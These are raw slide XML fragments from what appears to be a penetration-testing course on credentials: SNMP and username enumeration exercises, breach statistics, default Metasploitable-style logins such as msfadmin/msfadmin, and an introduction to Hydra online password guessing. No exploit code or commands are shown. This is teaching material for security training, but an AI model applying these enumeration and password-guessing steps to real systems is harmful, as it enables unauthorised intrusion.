              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Walk SNMP with the community string public and find the hostname and the running processes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Collect every username you find into users.txt, one per line</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>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31</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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0B0711"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Shape 0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4297680" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="12082A"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2011680"/>
            <a:ext cx="3291840" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="15000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4937760" y="2788920"/>
            <a:ext cx="6675120" cy="822960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4983480" y="3657600"/>
            <a:ext cx="6583680" cy="731520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The most reliable way into a network</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>is still a password somebody reused.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>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32</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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04 / CREDENTIALS</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Why credentials get their own section</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33</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="1536192"/>
            <a:ext cx="3593592" cy="1874520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3415"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="1700784"/>
            <a:ext cx="3017520" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>22%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822960" y="2542032"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>of breaches start with stolen credentials, the single most common way in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Shape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1536192"/>
            <a:ext cx="3593592" cy="1874520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3415"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="1700784"/>
            <a:ext cx="3017520" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>20%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4617720" y="2542032"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>start with an exploited vulnerability, in second place</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8138160" y="1536192"/>
            <a:ext cx="3593592" cy="1874520"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3415"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="150D26"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="1700784"/>
            <a:ext cx="3017520" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="701DF5"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>88%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8412480" y="2542032"/>
            <a:ext cx="3063240" cy="777240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1700"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>of attacks on basic web applications involve stolen credentials</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="3566160"/>
            <a:ext cx="11064240" cy="274320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="1680"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9E95B8"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Source: Verizon Data Breach Investigations Report 2025, based on more than 12000 confirmed breaches.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4114800"/>
            <a:ext cx="5486400" cy="237744"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" spc="120" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHAT THIS MEANS FOR YOU</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="4480560"/>
            <a:ext cx="11064240" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The exploit is often unnecessary. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>If msfadmin/msfadmin works, you do not need CVE-2011-2523.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Usernames are half the work. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>That is why enumeration came first: SMTP, SNMP and SMB hand you the user list.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B174FB"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="34" charset="0"/>
                <a:ea typeface="Courier New" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>&gt; </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Defenders know this too. </a:t>
            </a:r>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2025"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="900"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Which is why every failed login is logged, and why you get exactly one shot at being quiet.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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04 / CREDENTIALS</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Hydra: guessing passwords against a live service</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34</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 0" descr="img/xhydra.png">    </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9646920" y="1481328"/>
            <a:ext cx="2011680" cy="2011680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566928" y="1536192"/>
            <a:ext cx="8778240" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:lnSpc>
                <a:spcPts val="2100"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E8E4F0"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Hydra talks to a live service and tries login after login. It is not cracking a hash offline. Every attempt is a real connection, a real log line, and a real chance of locking the account.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548640" y="2651760"/>
            <a:ext cx="8915400" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E1338"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="342A4A"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
